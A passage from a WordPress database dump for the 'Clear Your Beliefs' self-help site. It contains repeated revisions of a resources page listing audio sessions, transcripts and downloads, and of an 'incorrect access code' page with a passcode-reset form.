above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 21:37:35', '2014-06-29 02:37:35', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1162, 4194, '2014-06-28 21:38:47', '2014-06-29 02:38:47', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 21:38:47', '2014-06-29 02:38:47', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1163, 2, '2014-07-01 02:19:30', '2014-07-01 07:19:30', '', 'The Clear Your Beliefs Guidebook', '', 'inherit', 'closed', 'open', '', 'the-clear-your-beliefs-guidebook', '', '', '2014-07-01 02:19:30', '2014-07-01 07:19:30', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf', 0, 'attachment', 'application/pdf', 0),
(1164, 2, '2014-07-01 02:22:13', '2014-07-01 07:22:13', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h1></h1>\r\n<h1>The Guidebook</h1>\r\nDownload and read first:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf">The Clear Your Beliefs Guidebook</a>\r\n(Right-mouse-click and "Save As..." to your computer.\r\n<h1>Audio Recordings</h1>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: To save any file to your computer, Right-click the link and "Save As," pointing to the folder where you want the file saved for later listening (the default is usually your Downloads folder). Or, click each link and listen (or read) any file on your browser now.]</span>\r\n\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><strong><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span></strong>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><strong><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span></strong>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><strong><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span></strong>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><strong><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span></strong>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><strong><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span></strong>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><strong><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span></strong>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\n<strong>Bonus Call 1: Anodea Judith on Manifestating with Beliefs</strong>\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<strong>Bonus Call 2: Carista Luminare on Love and Relationships</strong><a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n<p style="text-align: center;">. . .</p>\r\n\r\n<h1><strong>Transcripts:</strong></h1>\r\n<strong>Session 1: Pull All the Old Junk Out of Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\n<strong>Session 2:  Clear Your Negative Beliefs About Who You Are</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\n<strong>Session 3: Clear Your Limiting Beliefs About Your Capabilities</strong>\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\n<strong>Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\n<strong>Session 5: Clear Your Old Beliefs About Money and Work</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\n<strong>Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\n<strong>Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\n<strong>Bonus Call: Carista Luminare, Ph.D.:  What Makes Love So Confusing?</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\n<strong>Bonus Call: Anodea Judith, Ph.D: The Spiritual Technology of Manifesting</strong>\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n<p style="text-align: center;"> . . .</p>\r\n\r\n<h1>Bonus Materials:</h1>\r\n<strong>The Belief Self-Diagnosis Exercise:   (</strong>First read and do Part 1.  Then read and do Part 2.)\r\n\r\n<strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)</strong>\r\n\r\n<strong> <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n<p style="text-align: center;">. . .</p>\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)  Once you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n<p style="text-align: center;">. . .</p>\r\n<p style="text-align: left;"><strong>Download and read the first two chapters</strong> of <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras</em> by Anodea Judith and Lion Goodman.    PDF: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf">Creating_On_Purpose_SampleChapters</a></p>\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-07-01 02:22:13', '2014-07-01 07:22:13', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1170, 4194, '2014-07-02 11:44:28', '2014-07-02 16:44:28', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" /></div>\r\n</form></div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:44:28', '2014-07-02 16:44:28', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1169, 4194, '2014-07-02 11:43:01', '2014-07-02 16:43:01', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/8361917d9aa5397b8f70576be53ad2a9" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n<div class="infusion-submit"><input type="submit" value="Reset Passcode" /></div>\r\n</form></div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:43:01', '2014-07-02 16:43:01', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1167, 4194, '2014-07-02 11:22:02', '2014-07-02 16:22:02', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; text-align: center;">\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"> </span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><span style="font-size: 12pt;" data-mce-mark="1"><strong>Please choose your pass code:</strong></span></span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><strong> </strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Password">Please choose your own passcode. *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:22:02', '2014-07-02 16:22:02', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1165, 4194, '2014-07-02 11:19:39', '2014-07-02 16:19:39', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box">\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"> </span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><span style="font-size: 12pt;" data-mce-mark="1"><strong>Please choose your pass code:</strong></span></span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><strong> </strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Password">Please choose your own passcode. *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:19:39', '2014-07-02 16:19:39', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1166, 4194, '2014-07-02 11:20:49', '2014-07-02 16:20:49', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box">\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"> </span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><span style="font-size: 12pt;" data-mce-mark="1"><strong>Please choose your pass code:</strong></span></span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><strong> </strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Password">Please choose your own passcode. *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-02 11:20:49', '2014-07-02 16:20:49', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1168, 4194, '2014-07-02 11:22:29', '2014-07-02 16:22:29', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to have the access code re-sent to you.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto;">\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 200px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"> </span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><span style="font-size: 12pt;" data-mce-mark="1"><strong>Please choose your pass code:</strong></span></span></div>\r\n<div><span style="font-size: 12pt;" data-mce-mark="1"><strong> </strong></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Password">Please choose your own passcode. 